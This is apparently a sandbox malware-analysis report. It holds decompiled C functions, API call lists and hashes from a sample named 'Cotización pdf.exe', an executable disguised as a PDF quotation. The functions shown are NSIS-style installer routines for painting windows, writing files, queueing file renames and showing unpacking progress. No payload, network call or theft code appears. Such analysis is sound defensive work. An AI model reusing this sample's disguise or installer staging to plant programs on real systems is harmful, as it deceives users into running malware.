					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004057D3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004057d9
0x004057e0
0x004057e4
0x004057ed
0x004057f1
0x00405930
0x00405930
0x00000000
0x00405930
0x004057f1
0x004057fd
0x00405813
0x0040583b
0x00405846
0x0040584a
0x0040586a
0x00405871
0x0040587b
0x00405888
0x0040588d
0x00405892
0x00405896
0x00000000
0x00000000
0x004058a5
0x004058a7
0x004058b4
0x004058b8
0x00405929
0x0040592a
0x00000000
0x004058d4
0x004058e1
0x00405946
0x0040594d
0x004058f4
0x004058f4
0x004058f6
0x004058ff
0x0040590a
0x0040591c
0x00405923
0x00000000
0x00405923
0x0040594f
0x00405950
0x00405955
0x00405957
0x00405964
0x00405964
0x00405968
0x00000000
0x00000000
0x00000000
0x00000000
0x00405959
0x00405959
0x0040595c
0x0040595f
0x00405960
0x00000000
0x00405959
0x004058ec
0x004058f1
0x00000000
0x004058f1
0x004058b8
0x00405815
0x00405820
0x00405829
0x0040582d
0x00000000
0x00000000
0x0040582d
0x0040593a

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
GetShortPathNameA.KERNEL32 ref: 00405829
GetShortPathNameA.KERNEL32 ref: 00405846
wsprintfA.USER32 ref: 00405864
GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
GlobalFree.KERNEL32 ref: 00405923
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A

Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Strings

%s=%s, xrefs: 0040585A
[Rename], xrefs: 004058D4, 004058E6
(&B, xrefs: 0040580E

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$(&B$[Rename]
API String ID: 3772915668-1834469719
Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE3, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405ce5
0x00405ced
0x00405d01
0x00405d01
0x00405d07
0x00405d14
0x00405d14
0x00405d15
0x00405d17
0x00405d1b
0x00405d1d
0x00405d26
0x00405d28
0x00405d42
0x00405d4a
0x00405d4a
0x00405d4f
0x00405d51
0x00405d53
0x00405d57
0x00405d58
0x00405d5b
0x00405d63
0x00405d65
0x00405d69
0x00000000
0x00000000
0x00405d6f
0x00405d74
0x00000000
0x00000000
0x00000000
0x00405d74
0x00405d79

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
CharNextA.USER32(?,?,?,00000000), ref: 00405D48
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

Strings

*?|<>/":, xrefs: 00405D2B
C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F
"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" , xrefs: 00405CE9

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3346280921
Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9E, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403eb0
0x00403f44
0x00000000
0x00403f44
0x00403ec1
0x00403ec5
0x00000000
0x00000000
0x00403ecb
0x00403ed4
0x00403ed7
0x00403ed7
0x00403edd
0x00403ee3
0x00403ee3
0x00403eef
0x00403ef5
0x00403efc
0x00403eff
0x00403f02
0x00403f04
0x00403f04
0x00403f0c
0x00403f12
0x00403f12
0x00403f1c
0x00403f21
0x00403f24
0x00403f29
0x00403f2c
0x00403f2c
0x00403f3c
0x00403f3c
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403EBB
GetSysColor.USER32(00000000), ref: 00403ED7
SetTextColor.GDI32(?,00000000), ref: 00403EE3
SetBkMode.GDI32(?,?), ref: 00403EEF
GetSysColor.USER32(?), ref: 00403F02
SetBkColor.GDI32(?,?), ref: 00403F12
DeleteObject.GDI32(?), ref: 00403F2C
CreateBrushIndirect.GDI32(?), ref: 00403F36

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040266e
0x00402670
0x0040267c
0x0040267f
0x00402689
0x0040268d
0x0040268d
0x00402693
0x004026a0
0x004026a8
0x004026ab
0x004026b1
0x004026bf
0x004026c4
0x004026c8
0x004026cb
0x004026d4
0x004026e0
0x004026e4
0x004026e7
0x004026f1
0x00402710
0x004026f8
0x004026fd
0x00402705
0x00402708
0x0040270d
0x0040270d
0x00402717
0x00402717
0x00402729
0x00402730
0x00402742
0x00402742
0x00402748
0x00402748
0x00402753
0x00402754
0x00402758
0x0040275c
0x00402762
0x00402762
0x00402769
0x00402156
0x00402880
0x0040288c

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E23, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404e29
0x00404e35
0x00404e38
0x00404e3e
0x00404e4a
0x00404e4d
0x00404e50
0x00404e56
0x00404e56
0x00404e5c
0x00404e64
0x00404e67
0x00404e84
0x00404e88
0x00404e91
0x00404e91
0x00404e9b
0x00404ea4
0x00404eb0
0x00404eb7
0x00404ebb
0x00404ebe
0x00404ed1
0x00404edf
0x00404edf
0x00404ee3
0x00404ee5
0x00404ee8
0x00000000
0x00404ee8
0x00404e69
0x00404e71
0x00404e79
0x00404e7f
0x00000000
0x00404e7f
0x00404e79
0x00404e67
0x00404ef2

APIs

lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
SendMessageA.USER32 ref: 00404EB7
SendMessageA.USER32 ref: 00404ED1
SendMessageA.USER32 ref: 00404EDF

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004046F2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404700
0x0040470d
0x00404713
0x00404751
0x00404751
0x00404760
0x00404767
0x00000000
0x00404769
0x00404715
0x00404724
0x0040472c
0x0040472f
0x00404741
0x00404747
0x0040474e
0x00000000
0x0040474e
0x00000000

APIs

SendMessageA.USER32 ref: 0040470D
GetMessagePos.USER32 ref: 00404715
ScreenToClient.USER32 ref: 0040472F
SendMessageA.USER32 ref: 00404741
SendMessageA.USER32 ref: 00404767

Strings

f, xrefs: 00404743

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b6a
0x00402b6f
0x00402b71
0x00402b71
0x00402b7c
0x00402b8c
0x00402b9e
0x00402b9e
0x00402ba6
